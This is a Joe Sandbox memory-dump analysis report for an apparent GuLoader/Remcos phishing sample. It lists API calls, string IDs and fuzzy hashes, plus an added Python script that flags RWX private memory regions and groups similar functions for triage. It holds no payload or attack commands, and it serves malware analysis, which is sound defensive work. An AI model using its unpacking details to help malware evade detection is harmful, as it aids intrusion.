                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-224404859
                                                                                              • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                              • Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
                                                                                              • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                              • Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
                                                                                              • CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                              • Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
                                                                                              • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                              • Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \V#k
                                                                                              • API String ID: 0-2892493493
                                                                                              • Opcode ID: 255001c8551852d849b1f30045f0e09ff3fd6f11943c3a8ccaa406a20d9f57e4
                                                                                              • Instruction ID: 393261f884989d19e1fb82c278b2908568e352551a8def8086a73cd9dd0bc94b
                                                                                              • Opcode Fuzzy Hash: 255001c8551852d849b1f30045f0e09ff3fd6f11943c3a8ccaa406a20d9f57e4
                                                                                              • Instruction Fuzzy Hash: 79B13B71E00209DFDB10CFA9D9857ADBFF2AFC8314F148529D819A7254EF74A846CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
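The dump names in the Memory Dump Source fields carry the region base, page protection and memory type, and reading them is what separates the two kinds of records above: the sample's regions are MEM_IMAGE pages with read-only, read-write or execute-read protection (0x02, 0x04, 0x20) behind a real PE, while the 04F40000 region dumped from the powershell process is PAGE_EXECUTE_READWRITE (0x40) MEM_PRIVATE (0x20000) memory with no backing PE, which is the footprint that the "unpacking or dynamic code loading" signature in the overview refers to. The script below, an added example that is not Joe Sandbox or IDA-plugin code, parses those names, flags RWX private regions, and compares the instruction fuzzy hashes of the two powershell functions. It assumes the field layout inferred from the names on this page (only the protection and memory-type fields are decoded, against documented winnt.h constants; the other fields are kept as opaque integers), and the nibble-match similarity is an assumed heuristic, not Joe Sandbox's own metric.

```python
"""Decode Joe Sandbox memory-dump names and compare instruction fuzzy hashes.

Added example, not Joe Sandbox code. Field layout is inferred from the dump
names on this page; names for fields 1, 2, 3, 6 and 8 are assumptions.
"""
import re
from dataclasses import dataclass

# Documented Windows memory constants (winnt.h).
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}
MEM_TYPE = {
    0x00020000: "MEM_PRIVATE",
    0x00040000: "MEM_MAPPED",
    0x01000000: "MEM_IMAGE",
}

# Eight dot-separated fields before ".sdmp".
_DUMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpName:
    proc_idx: int   # assumed: 0 = submitted sample, 1 = powershell child on this page
    snap_idx: int   # assumed: snapshot index
    dump_id: int    # opaque
    base: int       # region base; matches the "Offset:" value shown on the page
    protect: int    # page protection, decoded via PAGE_PROTECT
    field6: int     # opaque
    mem_type: int   # MEM_IMAGE / MEM_PRIVATE / MEM_MAPPED
    field8: int     # opaque


def parse_dump_name(name: str) -> DumpName:
    m = _DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    f = m.groups()
    return DumpName(int(f[0], 16), int(f[1], 16), int(f[2]), int(f[3], 16),
                    int(f[4], 16), int(f[5], 16), int(f[6], 16), int(f[7], 16))


def describe(d: DumpName) -> str:
    prot = PAGE_PROTECT.get(d.protect, f"protect=0x{d.protect:X}")
    kind = MEM_TYPE.get(d.mem_type, f"type=0x{d.mem_type:X}")
    return f"{kind} @ 0x{d.base:08X} {prot}"


def is_rwx_private(d: DumpName) -> bool:
    """Writable and executable private memory: what an in-memory unpacker or
    reflective loader leaves behind, unlike a mapped image section."""
    return d.protect == 0x40 and d.mem_type == 0x00020000


def fuzzy_hash_matches(a: str, b: str) -> int:
    """Count of equal hex nibbles at the same position (assumed heuristic)."""
    a, b = a.strip().upper(), b.strip().upper()
    if len(a) != len(b):
        raise ValueError("fuzzy hashes of different length")
    return sum(x == y for x, y in zip(a, b))


def fuzzy_hash_similarity(a: str, b: str) -> float:
    return fuzzy_hash_matches(a, b) / len(a.strip())


_FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*?)\s*$")


def parse_record(text: str) -> dict:
    """Turn one bullet record from the page into {field: [values]}, stripping
    the 'Download File' link residue that follows dump names in the export."""
    rec = {}
    for line in text.splitlines():
        m = _FIELD_RE.match(line)
        if m:
            val = m.group(2).replace("Download File", "").strip()
            rec.setdefault(m.group(1), []).append(val)
    return rec


# Input constructed from records on this page.
SAMPLE_TEXT_DUMP = "00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp"
POWERSHELL_DUMP = "00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp"
PS_HASH_A = "79B13B71E00209DFDB10CFA9D9857ADBFF2AFC8314F148529D819A7254EF74A846CBA1"
PS_HASH_B = "9CB17F71E00209DFDB10CFA9C89179DBFF2AF88314F148529D859E7294EF74A886CB91"


def triage() -> list:
    out = []
    for n in (SAMPLE_TEXT_DUMP, POWERSHELL_DUMP):
        d = parse_dump_name(n)
        flag = "  <-- RWX private region, carve it for the unpacked payload" if is_rwx_private(d) else ""
        out.append(f"proc {d.proc_idx}: {describe(d)}{flag}")
    out.append(f"powershell fn hashes: {fuzzy_hash_similarity(PS_HASH_A, PS_HASH_B):.0%} nibble match")
    return out


if __name__ == "__main__":
    print("\n".join(triage()))
```

The two powershell functions share 55 of 70 nibbles, which is why their records sit next to each other under the same 04F40000 dump; a triage script can use that count to group near-duplicate functions before spending analyst time on them, and treat every PAGE_EXECUTE_READWRITE MEM_PRIVATE dump as a candidate for carving the decrypted GuLoader or Remcos stage.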

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 219d60bc02fffe2078941d325b7ac34b3671f48b3636b559ef5fb9317a621aa3
                                                                                              • Instruction ID: 47aea3c0143d72bdb0bb92ec6eabe543a25592659dd06d59cb276c2695f30988
                                                                                              • Opcode Fuzzy Hash: 219d60bc02fffe2078941d325b7ac34b3671f48b3636b559ef5fb9317a621aa3
                                                                                              • Instruction Fuzzy Hash: 9CB17F71E00209DFDB10CFA9C89179DBFF2AF88314F148529D859E7294EF74A886CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                              • API String ID: 0-1420252700
                                                                                              • Opcode ID: 03e0b6c77a0d86e4b3d0ec73c18e1107bc50ebbb25b8ca7a8e863a6cb395fd97
                                                                                              • Instruction ID: c09324172724c75434f1272d076877101f383393256cfcc8d945684965a03733
                                                                                              • Opcode Fuzzy Hash: 03e0b6c77a0d86e4b3d0ec73c18e1107bc50ebbb25b8ca7a8e863a6cb395fd97
                                                                                              • Instruction Fuzzy Hash: EBE181B0B402099FE714DB68C940B5EBBB2EF95304F14C4A9DA05AF395CB75EC49CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q$$^q
                                                                                              • API String ID: 0-831282457
                                                                                              • Opcode ID: 7b3a580e12c668cfb45e832b9d9937a8d772dd9436913a2b6ba410a31f9efea0
                                                                                              • Instruction ID: 4082c9a2746b45b15bff4eb8d5b585bf39e6ff917dea19d6b03df7d9f714261b
                                                                                              • Opcode Fuzzy Hash: 7b3a580e12c668cfb45e832b9d9937a8d772dd9436913a2b6ba410a31f9efea0
                                                                                              • Instruction Fuzzy Hash: 182127F170030E5BEB3C596E9800B2BAEDAABC0711F24886AA50ACF3C5DD35D84583E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q
                                                                                              • API String ID: 0-2697143702
                                                                                              • Opcode ID: 5ef0bbffd1909671d0dfaec0461df7f7d172df50e02eeaf2125ca5bac387a729
                                                                                              • Instruction ID: cd88e211c49d593a65d5533a6876508b9f309dbe9405e5f1d7bbeae8c2125999
                                                                                              • Opcode Fuzzy Hash: 5ef0bbffd1909671d0dfaec0461df7f7d172df50e02eeaf2125ca5bac387a729
                                                                                              • Instruction Fuzzy Hash: B92271B0B002189FDB14DB68C955F6ABFB2EB84304F1085A9E9059F3A6CB72DC45CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q
                                                                                              • API String ID: 0-2697143702
                                                                                              • Opcode ID: 7893088b757477c77b49ef7994517aa340b5ff6e686145fd7c97e34614a9cf13
                                                                                              • Instruction ID: 5ccaec739556bd637780aa0258892f851a948a29a8aba777cf6e7ea8d75a20d4
                                                                                              • Opcode Fuzzy Hash: 7893088b757477c77b49ef7994517aa340b5ff6e686145fd7c97e34614a9cf13
                                                                                              • Instruction Fuzzy Hash: 001260B0700218DFDB24DB58CD55B9ABBB2EB85304F108499D909AF396CB72ED85CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q
                                                                                              • API String ID: 0-2697143702
                                                                                              • Opcode ID: 82172d59645060a566ab396eee9ba3ba046c7d14a8dac9e24f852e4209ee0b72
                                                                                              • Instruction ID: 530172acfe5978d268b4a3f687e55b4efe4ac27883c4c28470eec9f2f632dacf
                                                                                              • Opcode Fuzzy Hash: 82172d59645060a566ab396eee9ba3ba046c7d14a8dac9e24f852e4209ee0b72
                                                                                              • Instruction Fuzzy Hash: D0C18EB4B002499FEB14DB58C940B9EBBB2EF99304F14C499DA056F3A5CB71E849CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q
                                                                                              • API String ID: 0-355816377
                                                                                              • Opcode ID: 5eb83aebae78ac391f3bc418fd7a6b1d49c11a28ad5bcf536f242e869389cadb
                                                                                              • Instruction ID: 278d69da7759f8e4eb5afe6e514e6a3b9cb4ad8e442317a098282db53d2ace1b
                                                                                              • Opcode Fuzzy Hash: 5eb83aebae78ac391f3bc418fd7a6b1d49c11a28ad5bcf536f242e869389cadb
                                                                                              • Instruction Fuzzy Hash: 4C117AF570430E27FB38082E8801BAB7EDA9BD0710F148469B906CF3C5D935D48882F5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q
                                                                                              • API String ID: 0-355816377
                                                                                              • Opcode ID: 282bee52e7bf8bde0ccefe4da7866d582fc08f46fbc16e2964e929b15675c01f
                                                                                              • Instruction ID: 27f318382960bfdc3b944076532c6a4377ad32ba26c398af2d73e978bc7cd44e
                                                                                              • Opcode Fuzzy Hash: 282bee52e7bf8bde0ccefe4da7866d582fc08f46fbc16e2964e929b15675c01f
                                                                                              • Instruction Fuzzy Hash: 23012BF1B442098FE7289B588850A2BB7E3FFD4614B24896ED405CF394CE32CC169792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q
                                                                                              • API String ID: 0-1614139903
                                                                                              • Opcode ID: 2c86da8f78157dbcaf03a28e2e7217cfd71e28f23887982900ebe3123f77734a
                                                                                              • Instruction ID: b9b2a347103db3450de5467ab779c28e7eb46725d571cce9e9fc944124716f0f
                                                                                              • Opcode Fuzzy Hash: 2c86da8f78157dbcaf03a28e2e7217cfd71e28f23887982900ebe3123f77734a
                                                                                              • Instruction Fuzzy Hash: E2324EB4B002199FDB20DB58C945F6ABBB2FB84304F14C5A9E9099F396CB72DC45CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q
                                                                                              • API String ID: 0-1614139903
                                                                                              • Opcode ID: abbcbaa69ff82b128287e58ca658cf659eadf01921dca349868a5ac2355c3746
                                                                                              • Instruction ID: 5d734e90a5132844146cda69826bd40fbc3a7000fc85143cd271d262a80136d9
                                                                                              • Opcode Fuzzy Hash: abbcbaa69ff82b128287e58ca658cf659eadf01921dca349868a5ac2355c3746
                                                                                              • Instruction Fuzzy Hash: 3F3260B0700218DFDB20DB58CD55F9ABBA2EB88304F108499D9099F396CB72ED85CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q
                                                                                              • API String ID: 0-1614139903
                                                                                              • Opcode ID: 3c9940da01e7de8af54c1f1a10d9bb23b9c88fde14cc2addb0fb740148c86f0a
                                                                                              • Instruction ID: 264f4c342eaeffbf95a1cb2b7e822c30553f14bcf26f5ba690e9410a1341ad70
                                                                                              • Opcode Fuzzy Hash: 3c9940da01e7de8af54c1f1a10d9bb23b9c88fde14cc2addb0fb740148c86f0a
                                                                                              • Instruction Fuzzy Hash: 710250B4B002199FDB10DB58C945F6ABBB2FB84304F108599E905AF3A6CB76EC45CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q
                                                                                              • API String ID: 0-1614139903
                                                                                              • Opcode ID: 951eed7bb14f53e5ceb47fbce7251ed6e0353a14c8bc83984fea652da7c852ee
                                                                                              • Instruction ID: db55b213f1243dacb7e178d2c9ddbc91cd57ee90f6bb72de697acef4e359cd14
                                                                                              • Opcode Fuzzy Hash: 951eed7bb14f53e5ceb47fbce7251ed6e0353a14c8bc83984fea652da7c852ee
                                                                                              • Instruction Fuzzy Hash: 550260B0700218DFDB24DB58CD95B9ABBB2EB84304F108499D909AF395CB72ED85CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1d11a2b0af69dadb797833241922c40169ac7693371c9119144e66cf39c44599
                                                                                              • Instruction ID: 64875757332f8101dc6d2c4e28d5ac1fa418c917195f94147330a9b7e99f541d
                                                                                              • Opcode Fuzzy Hash: 1d11a2b0af69dadb797833241922c40169ac7693371c9119144e66cf39c44599
                                                                                              • Instruction Fuzzy Hash: 25526AB4B01209DFE714CB98C944E6EBBB2EF85304F1181A9E9059F795CB72EC85CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8fadc0da93871ed56ed95241dac27be901212d1a1f758c839c3fbcfcafe662e5
                                                                                              • Instruction ID: 241cae25872631b1af63618b0fdad1bf27d161a732467e40efaf89d5fc0b6a4c
                                                                                              • Opcode Fuzzy Hash: 8fadc0da93871ed56ed95241dac27be901212d1a1f758c839c3fbcfcafe662e5
                                                                                              • Instruction Fuzzy Hash: 5A326BB4A01209DFE714CB98C840E5DBBB2EF85314F1581A9E9059F796CB72EC46CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1555cfa4bf56ad5d8ee84036ba957c5554c602e1e760ef85bad6b2ed45a6ba6a
                                                                                              • Instruction ID: cb57eae24e5b4e99f4669f57010e2952967f20b7852aa4f9e416262bba9d9472
                                                                                              • Opcode Fuzzy Hash: 1555cfa4bf56ad5d8ee84036ba957c5554c602e1e760ef85bad6b2ed45a6ba6a
                                                                                              • Instruction Fuzzy Hash: 7D1269B4A01209EFE724CB98C940E6DBBB2EF95304F14C1A9E9159B795CB72EC45CF81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f1ef59d6ff87a73d8ea2a1f58c1ec0fa131a129fb46e56caff1e887d6b5a0349
                                                                                              • Instruction ID: 5b510c74cd5985828668ed5c6c5c21bbf629b397b0cd975d4ea0fe8c7e5a97c2
                                                                                              • Opcode Fuzzy Hash: f1ef59d6ff87a73d8ea2a1f58c1ec0fa131a129fb46e56caff1e887d6b5a0349
                                                                                              • Instruction Fuzzy Hash: BEE15FB4A00219CFEB20DB58C945BAABBB2FB85304F1085D9D909AF395CB71DD85CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e38e538d9dc61bc87226314339807b6128370fa1d40522c0c85f8d77ca5e82d
                                                                                              • Instruction ID: f10ea0b3e5bcc814cfd69e3f4511b746957db38f480a1104a940e7f0cde01bfa
                                                                                              • Opcode Fuzzy Hash: 6e38e538d9dc61bc87226314339807b6128370fa1d40522c0c85f8d77ca5e82d
                                                                                              • Instruction Fuzzy Hash: E8A13D35A002089FDB14EFA5D984AADBBF2FF84314F114559E806AF364DB74BD4ACB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 00f2c8b1ab5e584eed7ecb6b0f53f7c4a152d3b7cb0a9cdcd49c7a3522857ca3
                                                                                              • Instruction ID: 8bf69da5f69c58ebbfb9dfcb392d3a5e4c56de05c60b59b2d3036ec1decaf7ba
                                                                                              • Opcode Fuzzy Hash: 00f2c8b1ab5e584eed7ecb6b0f53f7c4a152d3b7cb0a9cdcd49c7a3522857ca3
                                                                                              • Instruction Fuzzy Hash: 0FB10875E012089FDB15CFA8D484A9DBFB2FF88314F248159E805AB365DB71ED86CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ee192f24ec0b96c53ac90bde4abd1d5227ce076806f36e2f4b47f808eb146c94
                                                                                              • Instruction ID: f5278a3d64c052f8f588ce254d081f99c62d7d7186d5c9ae3c09ce1d8dfe9833
                                                                                              • Opcode Fuzzy Hash: ee192f24ec0b96c53ac90bde4abd1d5227ce076806f36e2f4b47f808eb146c94
                                                                                              • Instruction Fuzzy Hash: 5391AFB1B00205DFEB24DB58C440E9ABBB2EF88314F1484A9D905AB791CB32ED45CFE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode Fuzzy Hash: 0fd7ec85d4fc5a0cca6df4f95bbd603d5288e0f8f16e4a908d26b448fd167045
